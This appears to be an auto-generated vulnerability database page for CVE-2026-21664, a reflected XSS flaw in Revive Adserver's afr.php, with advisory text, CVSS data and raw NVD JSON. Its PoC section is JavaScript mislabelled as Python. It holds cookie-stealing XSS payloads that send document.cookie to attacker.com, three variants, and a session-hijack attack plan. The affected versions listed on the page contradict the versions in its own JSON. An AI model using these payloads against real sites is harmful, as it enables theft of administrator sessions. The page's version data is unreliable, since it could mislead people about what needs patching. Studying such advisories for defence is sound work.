Security Vulnerability Report
中文
CVE-2026-21664 CVSS 6.1 MEDIUM

CVE-2026-21664

Published: 2026-01-20 21:16:07
Last Modified: 2026-02-03 21:04:36
Source: [email protected]

Description

HackerOne community member Huynh Pham Thanh Luc (nigh7c0r3) has reported a reflected XSS vulnerability in the afr.php delivery script of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:* - VULNERABLE
Revive Adserver < 5.1.1
Revive Adserver < 5.0.7
Revive Adserver < 4.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21664 Reflected XSS PoC for Revive Adserver afr.php // Target: Revive Adserver afr.php delivery script // Payload: Reflected XSS via URL parameter const http = require('http'); // XSS payload - steals admin cookies const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Construct malicious URL const targetHost = 'vulnerable-server.com'; const targetPath = '/afr.php'; const maliciousUrl = `http://${targetHost}${targetPath}?what=${encodeURIComponent(xssPayload)}`; console.log('[+] CVE-2026-21664 Reflected XSS PoC'); console.log('[+] Target:', targetHost); console.log('[+] Malicious URL:', maliciousUrl); console.log('[+] Payload:', xssPayload); // Alternative payload variants const payloads = [ xssPayload, '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">', '<svg/onload=fetch("https://attacker.com/steal?c="+document.cookie)>' ]; console.log('\n[+] Alternative payloads:'); payloads.forEach((p, i) => console.log(` ${i+1}. ${p}`)); // Attack scenario: // 1. Attacker crafts URL with XSS payload // 2. Attacker tricks logged-in admin to click the link // 3. Malicious script executes in admin's browser // 4. Attacker steals session cookies // 5. Attacker hijacks admin session

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21664", "sourceIdentifier": "[email protected]", "published": "2026-01-20T21:16:07.223", "lastModified": "2026-02-03T21:04:36.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HackerOne community member Huynh Pham Thanh Luc (nigh7c0r3) has reported a reflected XSS vulnerability in the afr.php delivery script of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed."}, {"lang": "es", "value": "El miembro de la comunidad de HackerOne Huynh Pham Thanh Luc (nigh7c0r3) ha informado de una vulnerabilidad de XSS reflejado en el script de entrega afr.php de Revive Adserver. Un atacante puede crear una URL específica que incluye una carga útil HTML en un parámetro. Si un administrador con sesión iniciada visita la URL, el HTML es enviado al navegador y se ejecutarían scripts maliciosos."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.4", "matchCriteriaId": "2AA08D1C-3638-4E0D-AC58-A8527E77536F"}]}]}], "references": [{"url": "https://hackerone.com/reports/3468169", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.